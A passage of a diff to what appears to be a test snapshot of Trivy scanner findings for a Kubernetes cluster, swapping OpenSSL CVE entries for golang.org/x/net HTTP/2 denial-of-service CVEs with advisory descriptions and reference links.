"https://errata.rockylinux.org/RLSA-2022:4899", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", - "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", - "https://linux.oracle.com/cve/CVE-2022-0778.html", - "https://linux.oracle.com/errata/ELSA-2022-9272.html", - "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", - "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", - "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20220321-0002/", - "https://security.netapp.com/advisory/ntap-20220429-0005/", - "https://support.apple.com/kb/HT213255", - "https://support.apple.com/kb/HT213256", - "https://support.apple.com/kb/HT213257", - "https://ubuntu.com/security/notices/USN-5328-1", - "https://ubuntu.com/security/notices/USN-5328-2", - "https://www.cve.org/CVERecord?id=CVE-2022-0778", - "https://www.debian.org/security/2022/dsa-5103", - "https://www.openssl.org/news/secadv/20220315.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.tenable.com/security/tns-2022-06", - "https://www.tenable.com/security/tns-2022-07", - "https://www.tenable.com/security/tns-2022-08", - "https://www.tenable.com/security/tns-2022-09", - ], - }, - "category": "Vulnerability", - "description": "The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0778", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/33", + "value": "https://pkg.go.dev/vuln/GO-2021-0356", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/35", + "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/38", + "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:5326", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20211209124913-491a49abca63", + "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-44716", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-44716", + "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "https://github.com/golang/go/issues/50058", + "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "https://go.dev/cl/369794", + "https://go.dev/issue/50058", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "https://linux.oracle.com/cve/CVE-2021-44716.html", + "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "https://pkg.go.dev/vuln/GO-2022-0288", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220121-0002/", + "https://www.cve.org/CVERecord?id=CVE-2021-44716", + ], + }, + "category": "Vulnerability", + "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "golang: net/http: limit growth of header canonicalization cache", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0778", + "value": "https://avd.aquasec.com/nvd/cve-2021-44716", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2062202", + "value": "https://access.redhat.com/security/cve/CVE-2021-44716", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", + "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2022-5326.html", + "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:4899", + "value": "https://github.com/golang/go/issues/50058", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", + "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", + "value": "https://go.dev/cl/369794", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", + "value": "https://go.dev/issue/50058", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-0778.html", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9272.html", + "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", + "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", + "value": "https://pkg.go.dev/vuln/GO-2022-0288", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", + "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + "https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", + ], + }, + "category": "Vulnerability", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "handle server errors after sending GOAWAY", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220321-0002/", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0005/", + "value": "https://access.redhat.com/errata/RHSA-2023:2357", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213255", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213256", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213257", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5328-1", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5328-2", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0778", + "value": "https://bugzilla.redhat.com/2107388", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5103", + "value": "https://bugzilla.redhat.com/2113814", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220315.txt", + "value": "https://bugzilla.redhat.com/2124669", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://bugzilla.redhat.com/2132872", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-06", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-07", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-08", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-09", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb10u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4450", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2165", - "https://access.redhat.com/security/cve/CVE-2022-4450", - "https://bugzilla.redhat.com/1960321", - "https://bugzilla.redhat.com/2164440", - "https://bugzilla.redhat.com/2164487", - "https://bugzilla.redhat.com/2164492", - "https://bugzilla.redhat.com/2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", - "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", - "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", - "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", - "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", - "https://errata.almalinux.org/9/ALSA-2023-2165.html", - "https://errata.rockylinux.org/RLSA-2023:0946", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", - "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", - "https://linux.oracle.com/cve/CVE-2022-4450.html", - "https://linux.oracle.com/errata/ELSA-2023-2932.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", - "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", - "https://ubuntu.com/security/notices/USN-5844-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4450", - "https://www.openssl.org/news/secadv/20230207.txt", - ], - }, - "category": "Vulnerability", - "description": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "double free after calling PEM_read_bio_ex", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4450", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2165", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4450", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1960321", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164440", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164487", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164492", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2164494", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://github.com/advisories/GHSA-69cg-p879-7622", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://github.com/golang/go/issues/54658", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://go.dev/cl/428735", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://go.dev/issue/54658", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://pkg.go.dev/vuln/GO-2022-0969", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://security.gentoo.org/glsa/202209-26", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.7.0", + "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41723", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "https://go.dev/cl/468135", + "https://go.dev/cl/468295", + "https://go.dev/issue/57855", + "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "https://pkg.go.dev/vuln/GO-2023-1571", + "https://vuln.go.dev/ID/GO-2023-1571.json", + "https://www.cve.org/CVERecord?id=CVE-2022-41723", + ], + }, + "category": "Vulnerability", + "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "avoid quadratic complexity in HPACK decoding", + "references": [ { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://avd.aquasec.com/nvd/cve-2022-41723", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", + "value": "https://access.redhat.com/security/cve/CVE-2022-41723", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", + "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", + "value": "https://go.dev/cl/468135", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4450.html", + "value": "https://go.dev/cl/468295", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://go.dev/issue/57855", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + "value": 